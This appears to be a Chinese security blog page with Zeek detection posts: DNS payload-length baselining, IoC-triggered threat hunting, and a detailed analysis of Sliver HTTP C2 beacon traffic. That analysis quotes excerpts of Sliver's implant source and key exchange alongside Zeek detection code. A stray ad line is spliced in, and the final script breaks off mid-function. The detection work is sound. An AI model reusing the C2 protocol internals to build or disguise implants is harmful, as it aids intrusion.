0%

写在前面:

​ 我嘞个去!小不在意都已经到了2024的下半年了,近期花了一些时间研究了DNS异常流量的检测模型。老样子依旧是放在Zeek上来实现,Zeek作为网络流量的“瑞士军刀”可玩性还是很大的。由于现在写Blog时间太少了,这里将会通过分期的形式进行更新。

​ 本期主题是:如何通过 Zeek Summary Statistics 实现动态基线,检测 DNS Payload 请求长度上的异常。

检测维度

1. 请求包长度异常

​ 通常最简单粗暴的方式就是通过手动指定一个『长度』作为告警阈值。但是难点就是『长度』设置为多少才算合适?长度设置较小,告警量多,误报率就会增加。长度设置较大,告警量少,但不一定会有告警。所以最好的方式就是能够动态计算一段时间内的『长度』作为阈值,以这个为基线去计算标准差和平均值再进行比对。

  • 定义一个动态基线时间窗口

    1
    2
    # Global variable for baseline interval
    const baseline_interval: interval = 300sec &redef; # Baseline interval for SumStats collection
  • 由于DNS在不同的请求类型下Payload长度也会有明显的差异,所以为了避免这类“干扰项”我们将按照DNS请求类型进行聚合来计算动态基线

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    export {
    # Define a record type to store the average and standard deviation
    type Stats: record {
    prev_avg: count; # Previous average payload size
    prev_sd: count; # Previous standard deviation of payload size
    };

    # Define a table to store the data
    option data: table[string] of Stats;
    }
  • 考虑到实际环境中DNS的请求数量会非常的多,我们也需要考虑代码在上线后对集群负载带来的影响。所以,这里将会通过local_domainignore_qtypesignore_querysignore_subdomainsignore_domainsignore_tlds等多个条件进行控制。

    • local_domian:代表实际环境中的内部域名,这些域名通常用于企业内网或者内部业务系统之间的通讯和API调用。通常这些域名不需要被列入到动态基线的计算范围内,因为它们在多数情况下都是在内部网络环境中使用,而非公开互联网访问。这有助于减少不必要的噪音和误报,提高基线计算的准确性。
    • ignore_qtypes:代表你需要忽略的DNS请求类型。
    • ignore_querys:代表你需要忽略的完整DNS请求。如:canon88.github.io 就是一个完整的域名请求
    • ignore_subdomains:代表你需要忽略的子域名。例如:在 canon88.github.io 中,canon88 就是子域名
    • ignore_domains:代表你需要忽略的主域名或二级域名。例如:在 canon88.github.io 中,github.io 是主域
    • ignore_tlds:代表你需要忽略的顶级域名(TLD)。例如:在 canon88.github.io 中,io 就是顶级域名。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    event dns_message(c: connection, is_orig: bool, msg: dns_msg, len: count) &priority=-10 { 
    # Return early if the domain is local
    if (c$dns$is_local_domain)
    return;

    # Filter out queries of types that should be ignored
    if (c$dns$qtype_name in SuspiciousDNSTraffic::ignore_qtypes)
    return;

    # Ignore trusted queries
    if (c$dns$query in SuspiciousDNSTraffic::ignore_querys)
    return;

    # Ignore trusted subdomains
    if ( (c$dns?$subdomain) && (c$dns$subdomain in SuspiciousDNSTraffic::ignore_subdomains) )
    return;

    # Ignore trusted domains
    if ( (c$dns?$domain) && (c$dns$domain in SuspiciousDNSTraffic::ignore_domains) )
    return;

    # Ignore trusted top-level domains
    if ( (c$dns?$tld) && ( (c$dns$tld in SuspiciousDNSTraffic::ignore_tlds) || (SuspiciousDNSTraffic::ignore_tlds_regex in c$dns$tld) ) )
    return;
    }
  • 下面开始进入“正题”,通过Zeek Summary Statistics 进行 DNS Payload 动态基线的计算。

    • 计算基线数据:使用 SumStats 模块每隔 baseline_interval(300秒) 计算一次 DNS 负载大小的平均值和标准差,并将这些数据存储在 data 表中。

    • 比对当前负载大小:在处理每个 DNS 消息时,当前负载大小(len)会与数据表中的先前平均值(prev_avg)和标准差(prev_sd)进行比对。

    • 比对阈值计算

      • 最大平均值阈值:avg * multiplier_threshold

      • 最小平均值阈值:avg / multiplier_threshold

      • 最大标准差阈值:avg + sd * deviation_threshold

      • 最小标准差阈值:avg - sd * deviation_threshold

    • 确定可疑负载

      • 如果当前负载大小超过最大平均值阈值或小于最小平均值阈值,则标记为可疑。

      • 如果当前负载大小超过最大标准差阈值或小于最小标准差阈值,则标记为可疑。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# Event handler for DNS messages
event dns_message(c: connection, is_orig: bool, msg: dns_msg, len: count) &priority=-10 {
# Store the payload size in the DNS::Info record
c$dns$payload_len = len;

# Observe the payload size for SumStats calculations
SumStats::observe("dns_payload_len", SumStats::Key($str=c$dns$qtype_name), SumStats::Observation($num=len));

if (c$dns$qtype_name in data) {
local avg = data[c$dns$qtype_name]$prev_avg;
local sd = data[c$dns$qtype_name]$prev_sd;

local max_avg_threshold = avg * SuspiciousDNSTraffic::multiplier_threshold;
local min_avg_threshold = avg / SuspiciousDNSTraffic::multiplier_threshold;
local max_sd_threshold = avg + sd * SuspiciousDNSTraffic::deviation_threshold;
local min_sd_threshold = avg - sd * SuspiciousDNSTraffic::deviation_threshold;

# Compare the current payload size with the calculated average and standard deviation
if ( avg != 0.0 ) {
local alert_reason: set[string] = set();
if ( len > max_avg_threshold ) {
c$dns$is_oversize_payload = T;
c$dns$avg_threshold = max_avg_threshold;
add alert_reason["payload_len > avg_threshold"];
} else if ( len < min_avg_threshold ) {
c$dns$is_oversize_payload = T;
c$dns$avg_threshold = min_avg_threshold;
add alert_reason["payload_len < avg_threshold"];
}

if ( len > max_sd_threshold ) {
c$dns$is_oversize_payload = T;
c$dns$sd_threshold = max_sd_threshold;
add alert_reason["payload_len > sd_threshold"];
} else if ( len < min_sd_threshold ) {
c$dns$is_oversize_payload = T;
c$dns$sd_threshold = min_sd_threshold;
add alert_reason["payload_len < sd_threshold"];
}

if ( |alert_reason| > 0 ) {
c$dns$alert_reason = alert_reason;
}
}

# c$dns$payload_prev_avg = avg;
# c$dns$payload_prev_sd = sd;
}
}

# Initialize the event handler for analyzing DNS requests
event zeek_init() {
# Define a reducer to calculate the standard deviation of DNS payload sizes
local r_std_dev = SumStats::Reducer($stream="dns_payload_len", $apply=set(SumStats::STD_DEV));

# Create a SumStats object to collect data every baseline_interval (e.g. 5 minutes)
SumStats::create([
$name = "dns_payload_len.std_dev",
$epoch = baseline_interval,
$reducers = set(r_std_dev),
$epoch_result(ts: time, key: SumStats::Key, result: SumStats::Result) = {
local current_avg = double_to_count(result["dns_payload_len"]$average);
local current_std_dev = double_to_count(result["dns_payload_len"]$std_dev);

# Initialize the table with the given data
data[key$str] = [$prev_avg = current_avg, $prev_sd = current_std_dev];

# Update the data table with the new values
Config::set_value("SuspiciousDNSTraffic::data", data);
}
]);
}

未完待续视频素材下载, 未完待续AE模板下载_光厂(VJ师网)

2. 请求域名长度异常
3. 非常见域名监控
4. Fast Flux
5. 非常见请求类型
6. 域名信誉度

前言

春节期间,我利用课余时间将之前的一些想法付诸实践。我们都知道,网络威胁分析(NTA)除了具备网络入侵检测系统(NIDS)功能外,还有一个重要特性就是强大的协议解析能力,这对于安全事件的溯源提供了极大的帮助。然而,并非所有的企业都能充分利用这个能力,主要原因有两个方面:

  1. 存储成本:如果需要进行全面的网络元数据捕获,它的存储成本将会是一个“挑战”。因为,你的网络流量越大也就意味着你的存储成本越高。
  2. 隐私合规:如果你所在公司的数据安全成熟度不高且公司业务又面临强合规监管。那么,合规法案将会在一定程度上与数据捕获的需求“冲突”。

所以,如果你和我一样在工作中即需要满足安全需求又需要考虑这么做是否合规,那么我相信本篇文章会对你有一些帮助,既在满足合规的前提下为威胁狩猎提供更多的网络元数据。

需求概述

当触发告警时,Zeek可以从Kafka获取IoC并根据指定时间窗口进行数据捕获。

实现步骤

  1. 首先,需要搞定如何让Zeek连接Kafka。好消息是,Zeek v6.0已经支持通过ZeekJS插件加载并执行JavaScript代码。有了JavaScript的加持,一切皆有可能!

  2. 其次,需要尝试为IoC设置过期时间。Zeek本身对部分类型是支持过期时间这个属性的,借助create_expire这个属性再加上Intelligence Framework就可以为每个IoC设置不同的过期时间。这里给大家推荐J-Grasintel-expire项目,我们就不用“重复造轮子”了。

  3. 最后,使用Intel::LOG作为触发器捕获元数据。这里需要使用Zeek的Intelligence Framework来对IoC进行实时的匹配,你可以将Intel::LOG视为一个触发器,一旦匹配到之后将会自动捕获与之对应的uid事件。这里需要使用Zeek v6.2,目前还没release,尝鲜的话可以先用 zeek version 6.2.0-dev 。

这里需要说明一点,Zeek中负责嗅探网络流量并解析协议的是Worker角色,所以我们的需求落实到代码层面也必须让Worker角色来执行。由于当前Intel::match()方法作用域是在Manager上而并非在Worker上。因此,它并不能满足我们当前的需求,好消息是 Zeek v6.2 版本将会支持,届时我们可以使用Intel::seen_policy()来实现。这里有个例外,如果你的环境中Zeek是非集群架构的话,因为Manager和Worker都在一台机器上,所以,就不存在这个问题了,直接使用Intel::match()就行了。若想了解更多关于Zeek架构方面的知识,请参考:Cluster-architecture

工作原理

解决了上述三个问题之后,它的工作流程应该是这样的:

Workflow

目录结构
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ tree threat-hunting
threat-hunting
├── config.dat
├── config.zeek
├── __load__.zeek
├── main.zeek
├── plugins
│   ├── conn
│   │   ├── investigation.zeek
│   ├── dns
│   │   ├── investigation.zeek
│   ├── http
│   │   ├── investigation.zeek
│   │   └── normalized.zeek
│   └── __load__.zeek
└── threathunting.js
脚本说明
Script Description
main.zeek 主程序,通过ZeekJS调用 threathunting.js
config.dat 配置文件,无需重启Zeek控制指定plugin的启用与禁用。你会经常用到它
plugins 插件目录,用户自定义的插件目录。你会经常用到它

如何使用

让我们动手,编写一个自己的插件!

通常你只需要创建一个investigation.zeek脚本,并编辑Intel::seen_policyHTTP::log_policy中的内容即可。如果你对日志标准化有需求也可以创建一个normalized.zeek来实现标准化。下面以创建./plugins/http/investigation.zeek为示例:

  • 首先,为你所需要的日志增加一个类型为boolthreathunting 字段,这里是 HTTP::Info

    1
    2
    3
    redef record HTTP::Info += {
    threathunting: bool &log &optional;
    };
  • 然后,使用 Intel::seen_policy 在匹配到情报时将threathunting字段设置为True。对了,这里HTTP记得添加config.datThreatHunting::enable_module HTTP,它将用来控制插件的热启停。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    # Hook for filtering Intel log entries based on predefined criteria.
    hook Intel::seen_policy(s: Intel::Seen, found: bool)
    {
    # Break if there is no match.
    if ( ! found )
    break;

    # Check if the current log entry matches the set investigation criteria.
    if ( ("HTTP" in enable_module) && (s$conn?$http) )
    s$conn$http$threathunting = T;
    }
  • 最后,使用 HTTP::log_policythreathunting 字段为True的日志进行捕获,搞定!是不是很简单?

    1
    2
    3
    4
    5
    6
    7
    8
    hook HTTP::log_policy(rec: HTTP::Info, id: Log::ID, filter: Log::Filter)
    {
    if ( filter$name == "http_investigation" ) {
    if (! rec?$threathunting) {
    break;
    }
    }
    }

功能演示

threathunting

  1. 这里通过推送IoC(httpbin.org)到Kafka,设置过期时间为60秒;

    1
    2
    3
    4
    5
    6
    7
    8
    9
    {
    "ioc": "httpbin.org",
    "type": "domain",
    "meta": {
    "expire": 60,
    "source": "SOAR",
    "desc": "bad domain"
    }
    }
  2. 模拟访问httpbin.org时将会触发Intel::LOG以及HTTP::LOG

  3. 60秒之后再次尝试访问httpbin.org,未生成Intel::LOG以及HTTP::LOG,因为IoC已过期。

让ChatGPT给上个“价值”

总的来说,使用Zeek进行威胁狩猎的过程在解决存储成本和隐私合规两大问题上展现了显著的优势。Zeek能够从Kafka获取IoC并在指定的时间窗口内进行数据捕获,有效地降低了存储成本。同时,利用Zeek的Intelligence Framework和intel-expire项目设置IoC的过期时间,避免了无限捕获带来的性能损耗,同时也确保了隐私合规。此外,编写自定义插件的功能为用户提供了极大的便利性和灵活性。值得一提的是,这个方案不仅在安全领域有着广泛的应用,也可以有效地应用于其他非安全的场景,如故障排错,从而发挥出更大的价值。

​ 废话少说,今天来给大家分享,如何利用Zeek实现对 Sliver Framework 中 HTTP C2 流量的检测。

image-20231103173433297

Sliver是什么?我反手就是一个GPT!

image-20231103173433297


Sliver HTTP C2 流量检测思路

我们此次的检测思路是针对Sliver HTTP beacon traffic进行检测,也就是我们俗称的“心跳”包。以下为分析与检测思路:

  1. 当你第一次启动时,Client 会通过一个POST请求与Server进行通讯,它的主要目的是与 Server 进行密钥(Session Key)交换。Sliver 为了规避流量检测,Client在每次连接Server时的请求都是随机的。同时 Sliver HTTP C2的定制化程度很高,用户只需修改http-c2.json中的对应配置项即可实现uri部分的定制化。以下截图为分别3次执行Client端后的POST请求,第1张图截图是修改默认配置项之后的uri的样子。

    第一次:

    image-20231104203402427

    第二次:

    image-20231104203213374

    第三次:

    image-20231104203502838

    ​ 如上所示,如果你想从uri(session_paths/session_files.session_file_ext)这个角度去检测基本不太可能,因为绕过的成本太低了。所以,我们必须另辟蹊径。通过分析源码,我们将检测目标放在了这些看似“随机”生成的请求参数上。以第一次的POST请求来看,参数ib=6578885j6是基于时间戳生成的一次性密钥(TOTP),另一个参数i=8148k7556是经过混淆之后的EncoderID。其实Body的长度也是一个特征,只不过必须在解码之后才能作为特征,这里没有纳入进去是因为Zeek在有些编码上的解码暂时无法实现。


    废话少说,放“码”过来
    • 参数ib=6578885j6是怎么来的?

      该参数是由 OTPQueryArgument 方法生成。此方法将会基于时间戳随机生成一个长度为2的字符串作为Key,并同时在value(密钥)中插入0到2个随机字符作为Value。

      image-20231108103916316

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      // OTPQueryArgument - Adds an OTP query argument to the URL
      func (s *SliverHTTPClient) OTPQueryArgument(uri *url.URL, value string) *url.URL {
      values := uri.Query()
      key1 := nonceQueryArgs[insecureRand.Intn(len(nonceQueryArgs))]
      key2 := nonceQueryArgs[insecureRand.Intn(len(nonceQueryArgs))]
      for i := 0; i < insecureRand.Intn(3); i++ {
      index := insecureRand.Intn(len(value))
      char := string(nonceQueryArgs[insecureRand.Intn(len(nonceQueryArgs))])
      value = value[:index] + char + value[index:]
      }
      values.Add(string([]byte{key1, key2}), value)
      uri.RawQuery = values.Encode()
      return uri
      }
    • 参数i=8148k7556是怎么来的?

      该参数是由 NonceQueryArgument 方法生成。此方法将会随机生成一个长度为1的字符串作为Key,并同时在value中插入0到2个随机字符作为Value。此处value实际是通过 RandomEncoder 方法中的(insecureRand.Intn(maxN) * EncoderModulus) + encoderID代码生成的nonce数值。

      image-20231108104044549

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      // NonceQueryArgument - Adds a nonce query argument to the URL
      func (s *SliverHTTPClient) NonceQueryArgument(uri *url.URL, value uint64) *url.URL {
      values := uri.Query()
      key := nonceQueryArgs[insecureRand.Intn(len(nonceQueryArgs))]
      argValue := fmt.Sprintf("%d", value)
      for i := 0; i < insecureRand.Intn(3); i++ {
      index := insecureRand.Intn(len(argValue))
      char := string(nonceQueryArgs[insecureRand.Intn(len(nonceQueryArgs))])
      argValue = argValue[:index] + char + argValue[index:]
      }
      values.Add(string(key), argValue)
      uri.RawQuery = values.Encode()
      return uri
      }

      // RandomEncoder - Get a random nonce identifier and a matching encoder
      func RandomEncoder() (int, Encoder) {
      keys := make([]int, 0, len(EncoderMap))
      for k := range EncoderMap {
      keys = append(keys, k)
      }
      encoderID := keys[insecureRand.Intn(len(keys))]
      nonce := (insecureRand.Intn(maxN) * EncoderModulus) + encoderID
      return nonce, EncoderMap[encoderID]
      }

      Encoder Map:

      ID Encoder
      13 Base64 with modified alphabet
      22 PNG
      31 English words
      43 Base58 with modified alphabet
      45 English words + Gzip compression
      49 Gzip compression
      64 Base64 + Gzip compression
      65 Base32 + Gzip compression
      92 Hex

      所以,我们根据代码片段可以反向推导出这个nonce 值实际是对应到了Sliver中的encoderID

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      import re

      encoders = {
      13: "b64",
      31: "words",
      22: "png",
      43: "b58",
      45: "gzip-words",
      49: "gzip",
      64: "gzip-b64",
      65: "b32",
      92: "hex"
      }

      def decode_nonce(nonce_value):
      """Takes a nonce value from a HTTP Request and returns the encoder that was used"""
      nonce_value = int(re.sub('[^0-9]','', nonce_value))
      encoder_id = nonce_value % 101
      return encoders[encoder_id]

      In [1]: decode_nonce("8148k7556")
      Out[1]: 'gzip'
    • POST Body里面有什么?这些数据是怎么来的?

      1. 先回答第一个问题,POST Body里面是一个长度为266个字节的加密数据。
      2. 关于第二个问题,我按照我的理解给大家画了一个POST Body数据生成的Workflow。来来来,我们看图说话:

      image-20231108111232203

      • 第1步:Client通过 cryptography.RandomKey() 方法随机生成一个32字节的sKey,这个sKey很重要后续的命令执行都会通过这个sKey进行加密。由于这里采用的是对称加密,所以解密也会用到这个sKey。这也就解释了为什么我们说第一次的POST请求是交换密钥,因为Server需要这个sKey做后续请求内容的解密。

        1
        2
        3
        4
        5
        6
        7
        8
        sKey := cryptography.RandomKey()

        // RandomKey - Generate random ID of randomIDSize bytes
        func RandomKey() [chacha20poly1305.KeySize]byte {
        randBuf := make([]byte, 64)
        rand.Read(randBuf)
        return deriveKeyFrom(randBuf)
        }
      • 第2步:通过 proto.Marshal() 方法对第一步生成的sKey进行序列化,这时候sKey的长度从32字节变成了34字节。

        1
        2
        3
        s.SessionCtx = cryptography.NewCipherContext(sKey)
        httpSessionInit := &pb.HTTPSessionInit{Key: sKey[:]}
        data, _ := proto.Marshal(httpSessionInit)

        关于为什么会多出2个字节0a20?我反手就是一个ChatGPT。

        image-20231107175632660

      • 第3步:通过HMAC(Hash-based Message Authentication Code)来保证sKey完整性和真实性。

        • 首先创建了一个新的HMAC实例
        • 接着使用implant’s private key的哈希值作为HMAC的密钥
        • 最后对plaintext处理得到HMAC值
        1
        2
        3
        4
        5
        6
        7
        8
        peerKeyPair := GetPeerAgeKeyPair()

        // First HMAC the plaintext with the hash of the implant's private key
        // this ensures that the server is talking to a valid implant
        privateDigest := sha256.New()
        privateDigest.Write([]byte(peerKeyPair.Private))
        mac := hmac.New(sha256.New, privateDigest.Sum(nil))
        mac.Write(plaintext)
      • 第4步:通过 AgeEncrypt() 方法,使用Server Public Key对plaintext进行加密。通过源码可以看到这里将HMAC值(32字节)添加到plaintext消息的前面。这样做是为了确保消息的完整性,Server端只需用同样的方法计算HMAC值并与plaintext中的前32字节进行对比,就可以知道消息在传输过程中是否被篡改。

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        ciphertext, err := AgeEncrypt(recipientPublicKey, append(mac.Sum(nil), plaintext...))

        // AgeEncrypt - Encrypt using Nacl Box
        func AgeEncrypt(recipientPublicKey string, plaintext []byte) ([]byte, error) {
        if !strings.HasPrefix(recipientPublicKey, agePublicKeyPrefix) {
        recipientPublicKey = agePublicKeyPrefix + recipientPublicKey
        }
        recipient, err := age.ParseX25519Recipient(recipientPublicKey)
        if err != nil {
        return nil, err
        }
        buf := bytes.NewBuffer([]byte{})
        stream, err := age.Encrypt(buf, recipient)
        if err != nil {
        return nil, err
        }
        if _, err := stream.Write(plaintext); err != nil {
        return nil, err
        }
        if err := stream.Close(); err != nil {
        return nil, err
        }
        return bytes.TrimPrefix(buf.Bytes(), ageMsgPrefix), nil
        }
      • 第5步:这段代码构建了一个消息msg,这个msg也就是Body在编码之前的样子。该消息包含了implant’s public key的HASH值和加密后的数据,总长度266字节。C2 Server 可以通过对比前32个字节中的HASH值来验证implant’s public key的真实性,并使用Server Pivate Key解密后面的数据。

        1
        2
        3
        4
        5
        // Sender includes hash of it's implant specific peer public key
        publicDigest := sha256.Sum256([]byte(peerKeyPair.Public))
        msg := make([]byte, 32+len(ciphertext))
        copy(msg, publicDigest[:])
        copy(msg[32:], ciphertext)

        最后的最后,Client会通过encoder.Encode()方法将266个字节的加密数据进行编码,所以我们捕获流量看到的PCAP数据已经不是“最初”的样子了,因为这段数据已经被编码过了。

        image-20231108112034359

      • 结论:当你看完这部分源码后你其实会发现,整个过程都是为了保护这个sKey不被泄露。最终我们可以得出一个简单的数据结构图,POST Body由截图中的3个部分组成。

      image-20231107211334773

      ​ 这是我模拟加密过程的输出,其中每个阶段的字节数都已经打印在界面上。

      image-20231108110145849

      结合上面的分析,我们可以抽象出对第一个POST请求的检测特征,如下图所示:

      image-20231108163024578

      Zeek 代码

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      event http_message_done(c: connection, is_orig: bool, stat: http_message_stat) {
      if (c$http$method == "POST" &&
      c$http$status_code == 200 &&
      c$http?$set_cookie &&
      is_suspicious_cookie(c$http$set_cookie) &&
      is_suspicious_query(c$http$method, c$http$uri)) {

      # record suspicious connections
      http_connection_state[c$http$uid] = split_string(c$http$set_cookie, /;/)[0];
      }
      }
  1. 在完成第一个可疑连接的捕获之后,接下来我们需要把重心回答如何检测HTTP的”信标“流量上了。(其实这里已经简单很多了,最难的其实是交换密钥的特征)如下图,我们可以把POST之后的GET请求可以看做都是“信标”通信流量。Sliver会采用“抖动”的方式规避基于周期性的检测,当然也包括uri的随机性。

    image-20231101170122908

    • 如上图,截图中的3个GET请求中每次的uri都是随机的,每次的编码方式也是随机的。好在这里对于“信标”特征的检测思路,可以复用之前参数检测的部分。所以,GET请求中的参数是通过NonceQueryArgument 方法生成的。

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      // NonceQueryArgument - Adds a nonce query argument to the URL
      func (s *SliverHTTPClient) NonceQueryArgument(uri *url.URL, value int) *url.URL {
      values := uri.Query()
      key := nonceQueryArgs[insecureRand.Intn(len(nonceQueryArgs))]
      argValue := fmt.Sprintf("%d", value)
      for i := 0; i < insecureRand.Intn(3); i++ {
      index := insecureRand.Intn(len(argValue))
      char := string(nonceQueryArgs[insecureRand.Intn(len(nonceQueryArgs))])
      argValue = argValue[:index] + char + argValue[index:]
      }
      values.Add(string(key), argValue)
      uri.RawQuery = values.Encode()
      return uri
      }
    • 源码中关于beacon的默认设置

      • BeaconInterval: 轮训时间 3s
      • BeaconJitter:抖动时间 4s
      1
      2
      3
      4
      5
      6
      7
      8
      message ImplantConfig {
      string ID = 1;
      bool IsBeacon = 2;
      int64 BeaconInterval = 3;
      int64 BeaconJitter = 4;

      ...
      }
    • 结合上面的分析,我们可以抽象出对”信标“请求的流量检测特征,如下图所示。

      image-20231103160641641

      Zeek 代码

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      # Event handler to process and inspect completed HTTP messages
      event http_message_done(c: connection, is_orig: bool, stat: http_message_stat) {
      if (c$http$method == "GET" && c$http$status_code == 204 && c$http?$cookie &&
      (c$http$uid in http_connection_state) &&
      (c$http$cookie == http_connection_state[c$http$uid])) {

      local key_str = fmt("%s#####%s#####%s#####%s#####%s",
      c$http$uid, c$id$orig_h, c$http$host, c$id$resp_p, c$http$cookie);
      local observe_str = c$http$uri;
      }
      }

难点:

  1. 问:如何在同一个TCP连接中,关联多个HTTP请求的上下文,实现场景的判断?

​ 答:这里可以尝试通过维护一个HTTP状态表来实现同一个uid下的多个HTTP请求关联。例如,将符合阶段-1的处理结果存储到http_connection_state中,后续只需通过检查HTTP状态表中的状态来执行之后的逻辑。

1
2
## Global table to store cookie state.
global http_connection_state: table[string] of string;
  1. 问:如何避免http_connection_state set无限扩大,降低”无效”uid的填充set?

​ 答:对于这个问题,可以使用Zeek的create_expire属性,用它来管理整个http_connection_state set的生命周期。按照我们之前的分析,Sliver的HTTP C2流量在密钥交换之后,会进行C2数据包轮训,“信标”时间会有1~4秒抖动。所以,我们可以给这个可疑uid设置一个create_expire属性。如:create_expire=300sec,那么300秒之后我们会自动删除http_connection_state 中的 http_uid,通常这个时间内已经足够我们判断该HTTP请求流中是否为Sliver HTTP beacon traffic了。

1
2
## Global table to store cookie state.
global http_connection_state: table[string] of string &create_expire=300sec;
  1. 问:如何实现对规则的快速启停以及调整,避免规则更新重启整个Zeek集群?

​ 答:这里建议使用Zeek的Configuration Framework,只需将规则中的配置写入到文件中,后续只需要更改配置文件就可以实现”热“加载,从而不需要对Zeek进行deploy

1
2
3
4
5
6
7
8
## Define module-level configuration options.
export {
## Option to turn on/off detection.
option enable: bool = T;

## Path to additional configuration for detection.
redef Config::config_files += { "/usr/local/zeek/share/zeek/site/rules/Sliver/config.dat" };
}
  1. 问:如何让规则只对指定的Zeek Worker生效?例如,我的环境中有30台Zeek,但是实际接入内对外流量Zeek只有2台,剩下都是外对内的流量。

​ 答:可以在代码中增加针对Zeek机器IP的判断,只针对指定的Zeek Worker IP进行规则的生效。这样一来,该规则也只需要在内对外的2台Zeek上生效,避免在负载很高的外对内的Zeek Worker上进行计算。

1
2
3
4
5
event http_message_done(c: connection, is_orig: bool, stat: http_message_stat) {
## Return early if detection is disabled or sensor IP is not allowed.
if (c$http$sensor_ip ! in allow_sensor)
return;
}
  1. 问:如何解码请求参数中的EncoderID?

    答:废话少说,放“码”过来

    • Zeek Code

      1
      2
      3
      4
      5
      6
      ## Decode nonce value to identify the encoder used in traffic encoding.

      function decode_nonce(nonce: string): int {
      local nonce_value = to_int(gsub(nonce, /[^[:digit:]]/, ""));
      return nonce_value % 101;
      }
    • Python Code

      1
      2
      3
      4
      5
      6
      7
      8
      ## Decode nonce value to identify the encoder used in traffic encoding.

      import re

      def decode_nonce(nonce_value):
      """Takes a nonce value from a HTTP Request and returns the encoder that was used"""
      nonce_value = int(re.sub('[^0-9]','', nonce_value))
      return nonce_value % 101
  2. 问:如何解码Post Body中的内容?

    答:详细参考这个文章吧 Solución al reto Sliver Forensics de #hc0n2023

Detect Sliver HTTP beacon traffic (Demo) 检测代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
## Module to detect Sliver HTTP traffic based on specific criteria.

module SliverHttpTraffic;

# Define a new notice type for Sliver HTTP beacon traffic.
redef enum Notice::Type += {
Sliver_HTTP_Beacon_Traffic
};

# Global configuration and settings
global http_connection_state: table[string] of string &create_expire=3600sec;
global encoder_ids: set[int] = [13, 22, 31, 43, 45, 49, 64, 65, 92];
global cookie_len: int = 32;

# Extending the HTTP::Info record to capture cookie-related details
redef record HTTP::Info += {
cookie: string &log &optional; # Value of the Cookie header
set_cookie: string &log &optional; # Value of the Set-Cookie header
};

# Extend the default notice record to capture specific details related to Sliver traffic.
redef record Notice::Info += {
host: string &log &optional; # Hostname involved in the suspicious activity
uris: set[string] &log &optional; # Set of suspicious URIs accessed
cookie: string &log &optional; # Suspicious cookie associated with the request
};

# Event handler to capture HTTP header information
event http_header(c: connection, is_orig: bool, name: string, value: string) {
if (is_orig && name == "COOKIE") {
c$http$cookie = value;
} else if (!is_orig && name == "SET-COOKIE") {
c$http$set_cookie = value;
}
}

# Utility function to decode nonce values
function decode_nonce(nonce: string): int {
local nonce_value = to_int(gsub(nonce, /[^[:digit:]]/, ""));
return nonce_value % 101;
}

# Function to check if an HTTP query is suspicious
function is_suspicious_query(method: string, uri: string): bool {
local url = decompose_uri(uri);
local encoder_id: int;

if (!url?$params) return F;

if (method == "POST" && |url$params| == 2) {
local key_length: table[count] of string;
for (k, v in url$params) {
if (|k| > 2) return F;
key_length[|k|] = v;
}

if ((2 ! in key_length) || (1 ! in key_length)) return F;

encoder_id = decode_nonce(key_length[1]);
return encoder_id in encoder_ids;
}

if (method == "GET" && |url$params| == 1) {
for (k, v in url$params) {
if (|k| > 1) return F;

encoder_id = decode_nonce(v);
return encoder_id in encoder_ids;
}
}

return F;
}

# Check if a cookie's structure is suspicious
function is_suspicious_cookie(cookie: string): bool {
local cookies = split_string(split_string(cookie, /;/)[0], /=/);
return (|cookies| == 2 && |cookies[1]| == cookie_len);
}

# Event handler to process and inspect completed HTTP messages
event http_message_done(c: connection, is_orig: bool, stat: http_message_stat) {
if (is_orig || !c?$http || !c$http?$status_code || !c$http?$method || !c$http?$uri) return;

if (c$http$method == "POST" && c$http$status_code == 200 && c$http?$set_cookie && is_suspicious_cookie(c$http$set_cookie) && is_suspicious_query(c$http$method, c$http$uri)) {
http_connection_state[c$http$uid] = split_string(c$http$set_cookie, /;/)[0];
}

if (c$http$method == "GET" && c$http$status_code == 204 && c$http?$cookie && (c$http$uid in http_connection_state) && (c$http$cookie == http_connection_state[c$http$uid])) {
local key_str = fmt("%s#####%s#####%s#####%s#####%s", c$http$uid, c$id$orig_h, c$http$host, c$id$resp_p, c$http$cookie);
local observe_str = c$http$uri;

# Create an observation for statistical analysis
SumStats::observe("sliver_http_beacon_traffic_event", [$str=key_str], [$str=observe_str]);
}
}

# Event to initialize and configure statistical mechanisms
event zeek_init() {
local r1 = SumStats::Reducer($stream="sliver_http_beacon_traffic_event", $apply=set(SumStats::UNIQUE));

# Set up the statistical analysis parameters
SumStats::create([
$name="sliver_http_beacon_traffic_event.unique",
$epoch=10sec,
$reducers=set(r1),
$threshold=3.0,
$threshold_val(key: SumStats::Key, result: SumStats::Result) = {
return result["sliver_http_beacon_traffic_event"]$num + 0.0;
},
$threshold_crossed(key: SumStats::Key, result: SumStats::Result) = {
if (result["sliver_http_beacon_traffic_event"]$unique == 3) {
local key_str_vector: vector of string = split_string(key$str, /#####/);
local suspicious_uri: set[string];
